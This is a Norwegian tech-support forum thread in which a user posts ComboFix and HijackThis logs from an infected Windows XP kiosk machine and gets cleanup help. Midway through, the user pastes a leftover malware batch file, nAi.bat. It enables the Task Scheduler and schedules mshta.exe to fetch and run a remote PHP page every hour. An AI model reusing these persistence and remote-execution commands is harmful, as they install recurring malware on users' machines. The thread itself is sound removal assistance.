FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava11.dll

FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava12.dll

FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava13.dll

FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava14.dll

FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJava32.dll

FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPJPI150_11.dll

FF - plugin: c:\programfiler\Java\jre1.5.0_11\bin\NPOJI610.dll

FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

.

- - - - TOMME PEKERE FJERNET - - - -

AddRemove-HijackThis - c:\documents and settings\kiosk\Mine dokumenter\Downloads\HijackThis.exe

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net

Rootkit scan 2009-10-26 16:26

Windows 5.1.2600 Service Pack 3 NTFS

skanner skjulte prosesser ...

skanner skjulte autostart-oppføringer ...

skanner skjulte filer ...

skanning vellykket

skjulte filer: 0

**************************************************************************

.

--------------------- DLL'er Lastet Av Kjørende Prosesser ---------------------

- - - - - - - > 'explorer.exe'(3032)

c:\windows\system32\WPDShServiceObj.dll

c:\windows\system32\PortableDeviceTypes.dll

c:\windows\system32\PortableDeviceApi.dll

.

------------------------ Andre Kjørende Prosesser ------------------------

.

c:\epoagent\Common Framework\FrameworkService.exe

c:\programfiler\McAfee\VirusScan Enterprise\Mcshield.exe

c:\programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe

c:\epoagent\Common Framework\naPrdMgr.exe

c:\programfiler\UPHClean\uphclean.exe

c:\combofix\CF6590.exe

c:\epoagent\Common Framework\McTray.exe

c:\windows\System32\rundll32.exe

c:\documents and settings\kiosk\Mine dokumenter\Programfiler\Opera10usb\OperaUSB.exe

c:\windows\system32\notepad.exe

c:\combofix\PEV.cfxxe

.

**************************************************************************

.

Tidspunkt ferdig: 2009-10-26 16:35 - maskinen ble startet på nytt

ComboFix-quarantined-files.txt 2009-10-26 15:35

Pre-Run: 26 628 726 784 byte ledig

Post-Run: 26 723 725 312 byte ledig

WindowsXP-KB310994-SP2-Pro-BootDisk-NOR.exe

[boot loader]

timeout=2

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]

c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

- - End Of File - - D798A1F723363DD1D4EF2A7107CB2759

Hvordan ser det ut? MBAM var forresten et herlig program. Skal installeres på den personlige maskina.

Takk for hjelp

Endret 26. oktober 2009 av Bl4cKnD

norbat · 26. oktober 2009

Ser greit ut dette.

Kjenner du til fila C:\nAi.bat?

Hvis ikke kan du høyreklikke og velg rediger for å se hva den inneholder.

Du kan avinstallere combofix ved å skrive combofix /uninstall fra kjør-feltet (start->kjør). Dette vil også nullstille systemgjenopprettingen slik at du ikke blir infisert ved en evt. gjenoppretting senere.

hlnd · 26. oktober 2009

Innhold:

@echo off

sc config Schedule start= auto

net start Schedule

at /delete /yes

at 00:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 01:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 02:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 03:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 04:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 05:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 06:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 07:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 08:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 09:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 10:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 11:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 12:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 13:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 14:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 15:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 16:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 17:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 18:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 19:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 20:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 21:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 22:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

at 23:26 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1255540236

exit

Slett...?

(Nei, dette er ikke noe jeg kjenner til)

Endret 26. oktober 2009 av Bl4cKnD

norbat · 26. oktober 2009

Ja, slett. Fila hører til infeksjonen som ble fjernet av MBAM.

hlnd · 26. oktober 2009

Sletta.

Ny HJT-logg (om du gidder sjekke for å sikre at alt er borte ):

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 18:43:01, on 26.10.2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16915)

Boot mode: Normal

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

c:\windows\system32\cistub.exe

c:\epoagent\Common Framework\FrameworkService.exe

C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe

C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe

C:\Programfiler\UPHClean\uphclean.exe

C:\WINDOWS\system32\wuauclt.exe

C:\WINDOWS\system32\hkcmd.exe

C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe

C:\epoagent\Common Framework\UdaterUI.exe

C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE

c:\epoagent\Common Framework\McTray.exe

C:\Programfiler\Messenger\msmsgs.exe

C:\Programfiler\Internet Explorer\IEXPLORE.EXE

C:\WINDOWS\system32\ctfmon.exe

C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\ProcessExplorer\procexp.exe

C:\WINDOWS\explorer.exe

C:\WINDOWS\system32\msiexec.exe

C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\Opera10usb\OperaUSB.exe

C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\LiberKey\Apps\Asuite\LKrun.exe